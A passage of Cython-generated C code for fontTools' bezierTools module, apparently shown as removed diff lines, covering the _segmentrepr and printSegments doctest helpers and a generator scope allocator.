"fontTools/misc/bezierTools.py":1459 - * return "%g" % obj - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) # <<<<<<<<<<<<<< - * - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12_segmentrepr_genexpr(CYTHON_UNUSED 
PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("genexpr", 0); - __pyx_cur_scope = (struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr, __pyx_empty_tuple, NULL); - if (unlikely(!__pyx_cur_scope)) { - __pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)Py_None); - __Pyx_INCREF(Py_None); - __PYX_ERR(0, 1459, __pyx_L1_error) - } else { - __Pyx_GOTREF((PyObject *)__pyx_cur_scope); - } - __pyx_cur_scope->__pyx_genexpr_arg_0 = __pyx_genexpr_arg_0; - __Pyx_INCREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_genexpr_arg_0); - { - __pyx_CoroutineObject *gen = __Pyx_Generator_New((__pyx_coroutine_body_t) __pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5, NULL, (PyObject *) __pyx_cur_scope, __pyx_n_s_genexpr, __pyx_n_s_segmentrepr_locals_genexpr, __pyx_n_s_fontTools_misc_bezierTools); if (unlikely(!gen)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_DECREF(__pyx_cur_scope); - __Pyx_RefNannyFinishContext(); - return (PyObject *) gen; - } - - /* function exit code */ - __pyx_L1_error:; - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr.genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value) /* 
generator body */ -{ - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *__pyx_cur_scope = ((struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr *)__pyx_generator->closure); - PyObject *__pyx_r = NULL; - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("genexpr", 0); - switch (__pyx_generator->resume_label) { - case 0: goto __pyx_L3_first_run; - default: /* CPython raises the right error here */ - __Pyx_RefNannyFinishContext(); - return NULL; - } - __pyx_L3_first_run:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 1459, __pyx_L1_error) - __pyx_r = PyList_New(0); if (unlikely(!__pyx_r)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_r); - if (unlikely(!__pyx_cur_scope->__pyx_genexpr_arg_0)) { __Pyx_RaiseUnboundLocalError(".0"); __PYX_ERR(0, 1459, __pyx_L1_error) } - if (likely(PyList_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) || PyTuple_CheckExact(__pyx_cur_scope->__pyx_genexpr_arg_0)) { - __pyx_t_1 = __pyx_cur_scope->__pyx_genexpr_arg_0; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_cur_scope->__pyx_genexpr_arg_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1459, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if 
CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1459, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1459, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_x); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_x, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_segmentrepr); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - 
PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_cur_scope->__pyx_v_x}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_t_4))) __PYX_ERR(0, 1459, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_90_segmentrepr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_obj) { - PyObject *__pyx_v_it = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - 
__Pyx_RefNannySetupContext("_segmentrepr", 1); - - /* "fontTools/misc/bezierTools.py":1454 - * '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))' - * """ - * try: # <<<<<<<<<<<<<< - * it = iter(obj) - * except TypeError: - */ - { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); - __Pyx_XGOTREF(__pyx_t_1); - __Pyx_XGOTREF(__pyx_t_2); - __Pyx_XGOTREF(__pyx_t_3); - /*try:*/ { - - /* "fontTools/misc/bezierTools.py":1455 - * """ - * try: - * it = iter(obj) # <<<<<<<<<<<<<< - * except TypeError: - * return "%g" % obj - */ - __pyx_t_4 = PyObject_GetIter(__pyx_v_obj); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1455, __pyx_L3_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_v_it = __pyx_t_4; - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1454 - * '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))' - * """ - * try: # <<<<<<<<<<<<<< - * it = iter(obj) - * except TypeError: - */ - } - - /* "fontTools/misc/bezierTools.py":1459 - * return "%g" % obj - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) # <<<<<<<<<<<<<< - * - * - */ - /*else:*/ { - __Pyx_XDECREF(__pyx_r); - __pyx_t_4 = __pyx_pf_9fontTools_4misc_11bezierTools_12_segmentrepr_genexpr(NULL, __pyx_v_it); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_Generator_Next(__pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyUnicode_Join(__pyx_kp_u__9, __pyx_t_5); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyUnicode_Format(__pyx_kp_u_s_2, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1459, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L6_except_return; - } - 
__pyx_L3_error:; - __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1456 - * try: - * it = iter(obj) - * except TypeError: # <<<<<<<<<<<<<< - * return "%g" % obj - * else: - */ - __pyx_t_6 = __Pyx_PyErr_ExceptionMatches(__pyx_builtin_TypeError); - if (__pyx_t_6) { - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr", __pyx_clineno, __pyx_lineno, __pyx_filename); - if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_4, &__pyx_t_7) < 0) __PYX_ERR(0, 1456, __pyx_L5_except_error) - __Pyx_XGOTREF(__pyx_t_5); - __Pyx_XGOTREF(__pyx_t_4); - __Pyx_XGOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":1457 - * it = iter(obj) - * except TypeError: - * return "%g" % obj # <<<<<<<<<<<<<< - * else: - * return "(%s)" % ", ".join(_segmentrepr(x) for x in it) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_8 = __Pyx_PyUnicode_FormatSafe(__pyx_kp_u_g, __pyx_v_obj); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1457, __pyx_L5_except_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L6_except_return; - } - goto __pyx_L5_except_error; - - /* "fontTools/misc/bezierTools.py":1454 - * '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))' - * """ - * try: # <<<<<<<<<<<<<< - * it = iter(obj) - * except TypeError: - */ - __pyx_L5_except_error:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_2); - __Pyx_XGIVEREF(__pyx_t_3); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); - goto __pyx_L1_error; - __pyx_L6_except_return:; - __Pyx_XGIVEREF(__pyx_t_1); - __Pyx_XGIVEREF(__pyx_t_2); - __Pyx_XGIVEREF(__pyx_t_3); - __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); - goto __pyx_L0; - } - - /* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - - /* function exit code */ - __pyx_L1_error:; - 
__Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools._segmentrepr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_it); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_12_segmentrepr_2generator5); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_93printSegments(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_92printSegments, "printSegments(segments)\nHelper for the doctests, displaying each segment in a list of\n segments on a single line as a tuple.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_93printSegments = {"printSegments", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_93printSegments, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_92printSegments}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_93printSegments(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_segments = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[1] = {0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int 
__pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("printSegments (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_segments,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_segments)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1462, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "printSegments") < 0)) __PYX_ERR(0, 1462, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 1)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - } - __pyx_v_segments = values[0]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("printSegments", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 1462, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.printSegments", __pyx_clineno, 
__pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_92printSegments(__pyx_self, __pyx_v_segments); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_92printSegments(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segments) { - PyObject *__pyx_v_segment = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - Py_ssize_t __pyx_t_2; - PyObject *(*__pyx_t_3)(PyObject *); - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("printSegments", 1); - - /* "fontTools/misc/bezierTools.py":1466 - * segments on a single line as a tuple. 
- * """ - * for segment in segments: # <<<<<<<<<<<<<< - * print(_segmentrepr(segment)) - * - */ - if (likely(PyList_CheckExact(__pyx_v_segments)) || PyTuple_CheckExact(__pyx_v_segments)) { - __pyx_t_1 = __pyx_v_segments; __Pyx_INCREF(__pyx_t_1); - __pyx_t_2 = 0; - __pyx_t_3 = NULL; - } else { - __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_segments); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1466, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1466, __pyx_L1_error) - } - for (;;) { - if (likely(!__pyx_t_3)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1466, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 1466, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1466, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = 
PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1466, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XDECREF_SET(__pyx_v_segment, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1467 - * """ - * for segment in segments: - * print(_segmentrepr(segment)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_segmentrepr); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1467, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_6 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_segment}; - __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1467, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_t_5 = __Pyx_PyObject_CallOneArg(__pyx_builtin_print, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1467, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1466 - * segments on a single line as a tuple. - * """ - * for segment in segments: # <<<<<<<<<<<<<< - * print(_segmentrepr(segment)) - * - */ - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. 
- */ - - /* function exit code */ - __pyx_r = Py_None; __Pyx_INCREF(Py_None); - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.printSegments", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_segment); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr[8]; -static int __pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = 0; - -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { - PyObject *o; - #if CYTHON_COMPILING_IN_LIMITED_API - allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); - o = alloc_func(t, 0); - #else - #if CYTHON_COMPILING_IN_CPYTHON - if (likely((int)(__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr > 0) & (int)(t->tp_basicsize == sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)))) { - o = (PyObject*)__pyx_freelist_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr[--__pyx_freecount_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr]; - memset(o, 0, sizeof(struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)); - (void) PyObject_INIT(o, t); - PyObject_GC_Track(o); - } else - #endif - { - o = (*t->tp_alloc)(t, 0); - if (unlikely(!o)) return 0; - } - #endif - return o; -} - -static void __pyx_tp_dealloc_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyObject *o) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr *p = (struct 
